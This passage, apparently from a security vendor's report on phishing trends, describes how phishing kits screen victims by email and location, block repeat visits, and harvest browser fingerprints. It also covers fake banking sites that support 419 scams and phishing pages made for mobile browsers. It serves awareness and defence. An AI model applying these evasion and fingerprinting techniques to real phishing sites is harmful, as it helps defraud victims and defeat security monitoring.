still out there and are worth noting.
Filtering by Geolocation and Email Address
Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance,
our analysts have witnessed phishing sites that validate their victims by comparing their email
address with a long list of confirmed email addresses for a certain region that the fraudster
obtained earlier. Some phishing emails are sent with email addresses embedded in the URL’s
parameters to make sure that only the people who received the phishing email will be able to
access the fraudulent site.
Make sure victim’s email address is
set in “id” parameter, otherwise
phishing won’t be shown
Check whether the email is
in the list
Check whether it is a returning
victim
Put it in ignore list to avoid
access for second time
If it passed the test,
redirect to phishing page
17. 17
Collecting Statistics
Statistics collection is another popular feature fraudsters like to implement in their attacks.
Sometimes, it is done using online services, but most of the time this feature is incorporates as
part of a phishing kit. User information like screen resolution, IP address, language preferences in
the browser, etc. allows fraudsters to mimic a victim’s online “fingerprint” to try and login to their
online accounts, avoiding detection of online-security monitoring solutions deployed in legitimate
websites.
18. 18
The 419 Scam
The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly,
enough people still fall victim to this simple and often humorous fictional cover story that
purportedly offers to share millions of dollars with the victim, if only they first provide a small
deposit to start the process… Now, in order to add greater believability or a trust factor to this
scam, fraudsters developed sites that imitate online banking, where the victims are given a set of
prepared account credentials to login. Usually, their name is displayed after they login, and they
can see that there are thousands or millions of dollars in their account. Once they gain this little
measure of the victim’s trust, the rest of the standard 419 scam can be played out more easily.
Smartphones Always At Our Side
We are now living in the ‘smartphone era’, where all sorts of tiny mobile devices with vast
computing and communication abilities are always at our side – fraudsters take into consideration
that victims are now more ‘attached’ to their email than ever before. Many of us check our
messages much more frequently, especially if we have a notification sound set on our device. And
accordingly, more and more fraudsters modify their phishing sites to accommodate mobile
browsers. Therefore, despite the rising awareness of online fraud in the general population and
the media, phishing remains one of the most dangerous cyber-threats.